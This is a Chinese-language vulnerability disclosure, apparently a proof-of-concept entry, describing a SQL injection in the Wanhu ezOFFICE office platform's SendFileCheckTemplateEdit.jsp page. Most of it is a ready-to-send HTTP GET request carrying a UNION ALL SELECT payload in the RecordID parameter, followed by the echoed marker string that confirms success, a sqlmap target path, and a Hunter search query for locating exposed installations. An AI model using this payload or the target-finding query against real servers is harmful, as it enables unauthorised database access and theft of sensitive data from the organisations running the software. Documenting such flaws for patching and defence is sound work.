万户协同办公平台ezoffice SendFileCheckTemplateEdit 存在SQL注入漏洞
一、漏洞简介
万户ezOFFICE协同管理平台是一个综合信息基础应用平台。 万户协同办公平台ezoffice SendFileCheckTemplateEdit 存在SQL注入漏洞,攻击者通过发送特殊的请求包可以对数据库进行SQL注入,获取服务器敏感信息。
二、影响版本
- 万户ezoffice
三、资产测绘
- hunter
app.name="万户 Ezoffice OA"
- 登录页面
四、漏洞复现
/defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp;xc?RecordID=1
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp;xc?RecordID=1%27+UNION+ALL+SELECT+NULL%2CNULL%2CCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28122%29%2BCHAR%28113%29%2BCHAR%28113%29%2BCHAR%28117%29%2BCHAR%2877%29%2BCHAR%2899%29%2BCHAR%2886%29%2BCHAR%2873%29%2BCHAR%2865%29%2BCHAR%2866%29%2BCHAR%28117%29%2BCHAR%2897%29%2BCHAR%2867%29%2BCHAR%28122%29%2BCHAR%28113%29%2BCHAR%2869%29%2BCHAR%2873%29%2BCHAR%28110%29%2BCHAR%2874%29%2BCHAR%28114%29%2BCHAR%2878%29%2BCHAR%2866%29%2BCHAR%28107%29%2BCHAR%2883%29%2BCHAR%28103%29%2BCHAR%2867%29%2BCHAR%2887%29%2BCHAR%2873%29%2BCHAR%2886%29%2BCHAR%2874%29%2BCHAR%2865%29%2BCHAR%2868%29%2BCHAR%28121%29%2BCHAR%2890%29%2BCHAR%2867%29%2BCHAR%28120%29%2BCHAR%2899%29%2BCHAR%2878%29%2BCHAR%28121%29%2BCHAR%2868%29%2BCHAR%28110%29%2BCHAR%2886%29%2BCHAR%28122%29%2BCHAR%28113%29%2BCHAR%28118%29%2BCHAR%28122%29%2BCHAR%28107%29%2BCHAR%28113%29%2CNULL%2CNULL%2CNULL--+QHgO HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: OASESSIONID=4E2455852565283AF1C96D72A82F0039; OASESSIONID=8CEBEFC17B098632FAECBAAFCFB50CE0; LocLan=zh_CN
Upgrade-Insecure-Requests: 1
qkzqquMcVIABuaCzqEInJrNBkSgCWIVJADyZCxcNyDnVzqvzkq
sqlmap
/defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp;xc?RecordID=1